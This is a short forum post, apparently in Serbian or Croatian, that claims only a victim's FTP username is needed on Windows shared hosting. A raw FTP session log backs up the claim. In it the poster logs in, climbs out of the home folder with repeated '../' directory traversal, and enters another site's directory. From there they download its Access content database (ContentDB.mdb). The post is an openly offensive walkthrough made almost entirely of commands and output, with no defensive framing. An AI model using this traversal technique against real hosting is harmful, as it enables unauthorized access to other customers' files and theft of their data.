Windows shared hosting, sve sto je potrebno znati je victim ftp username.
Code:
[email protected]::/root >>: ftp xxx.xxx.com
Connected to xxx.xxx.com.
220 victim-isp Microsoft FTP Service (Version 5.0).
Name (xxx.xxx.com:root): bc
331 Password required for bc.
Password:
230 User bc logged in.
Remote system type is Windows_NT.
ftp>
ftp> ls -al
500 'EPSV': command not understood
227 Entering Passive Mode (10,1,5,56,237,232).
^C
receive aborted
waiting for remote to finish abort.
ftp>
ftp> passive
Passive mode off.
ftp> pwd
257 "/bc" is current directory.
ftp> cd ../../../../../
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr-xr-xr-x 1 owner group 0 Oct 9 2003 nothing to see here ;)
226 Transfer complete.
ftp> pwd
257 "/" is current directory.
ftp> cd ../victim
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
-r-xr-xr-x 1 owner group 1759 May 3 2:09 _vti_inf.html
dr-xr-xr-x 1 owner group 0 Jun 1 23:07 admin_cms
dr--r--r-- 1 owner group 0 Sep 21 14:28 aspnet_client
dr-xr-xr-x 1 owner group 0 Jun 1 21:58 css
drwxrwxrwx 1 owner group 0 Jun 1 21:58 Db
-r-xr-xr-x 1 owner group 10901 May 3 2:09 default.asp
-r-xr-xr-x 1 owner group 708 May 3 2:09 error.asp
dr-xr-xr-x 1 owner group 0 Jun 1 22:00 images
dr-xr-xr-x 1 owner group 0 Jun 6 22:36 includes
dr-xr-xr-x 1 owner group 0 May 3 2:09 js
-r-xr-xr-x 1 owner group 2505 May 3 2:09 postinfo.html
-r-xr-xr-x 1 owner group 3538 May 3 2:09 print.asp
-r-xr-xr-x 1 owner group 156 May 3 2:09 robots.txt
226 Transfer complete.
ftp> cd Db
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
drwxrwxrwx 1 owner group 0 May 3 2:03 banners
drwxrwxrwx 1 owner group 0 May 3 2:04 content
drwxrwxrwx 1 owner group 0 Sep 25 15:13 data
drwxrwxrwx 1 owner group 0 Jun 1 21:59 news
drwxrwxrwx 1 owner group 0 May 3 2:05 statistic
226 Transfer complete.
ftp> cd data
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
drwxrwxrwx 1 owner group 0 May 3 2:04 _vti_cnf
-rwxrwxrwx 1 owner group 1904640 Sep 22 8:10 ContentDB.mdb
-rwxrwxrwx 1 owner group 1904640 Jul 22 18:13 ContentDB111.mdb
226 Transfer complete.
ftp> get ContentDB.mdb
local: ContentDB.mdb remote: ContentDB.mdb
200 PORT command successful.
150 Opening BINARY mode data connection for ContentDB.mdb(1904640 bytes).
100% |************************************************************************************************| 1860 KB 00:04
226 Transfer complete.
1904640 bytes received in 4.17 seconds (446.58 KB/s)
ftp>
"It's okay, I'm just admiring to the shape of your skull!" -- Dr. Gonzo